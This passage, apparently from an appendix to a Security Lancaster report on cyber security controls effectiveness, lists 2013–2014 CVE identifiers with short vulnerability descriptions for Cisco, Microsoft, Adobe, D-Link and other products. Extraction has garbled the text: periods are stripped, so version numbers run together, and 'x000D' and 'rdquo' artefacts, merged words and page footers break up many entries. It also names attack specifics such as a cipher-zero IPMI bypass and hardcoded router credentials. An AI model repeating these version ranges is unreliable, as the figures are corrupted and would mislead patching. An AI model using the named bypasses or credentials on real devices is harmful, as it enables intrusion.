CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
